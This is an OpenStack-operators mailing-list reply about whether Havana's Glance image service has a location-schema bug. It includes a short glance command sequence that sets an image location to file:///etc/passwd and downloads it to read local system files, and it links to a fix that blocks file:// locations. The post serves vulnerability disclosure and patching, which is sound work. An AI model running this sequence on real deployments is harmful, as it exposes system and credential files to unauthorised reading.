On 1/7/15 8:47 PM, George Shuklin wrote:
I spend few hours trying to backport to Havana, but than I found, that
Havana seems be immune to the bug. I'm not 100% sure, so someone else
advised to look too.
The bug was that icehouse+ accepts all supported schemas. Fix excludes
'bad' schemes. Although Havana have explicitly given list of accepted
schemes for location field, and 'bad' schemes are not in it.
Havana is certainly not immune. I was able to fetch content from the
system fairly easily.
Start with an updated glance client
Modify it as listed in
https://bugs.launchpad.net/glance/+bug/1400966/comments/6
$ glance image-create --disk-format raw --container-format bare
$ glance image-update --size 700 <image_id>
$ glance --os-image-api-version 2 location-add --url file:///etc/passwd
$ glance image-download <image_id>
That got me (some of) the contents of /etc/passwd.
The patch I posted prevented this from happening. It blocks adding a
location that is file:// based, but still allows other location adds
that should be allowed.
https://github.com/blueboxgroup/glance/commit/7ab98b72802de1d5695d35306e32293463977496
--
-jlk
_______________________________________________
OpenStack-operators mailing list
[email protected]
http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-operators
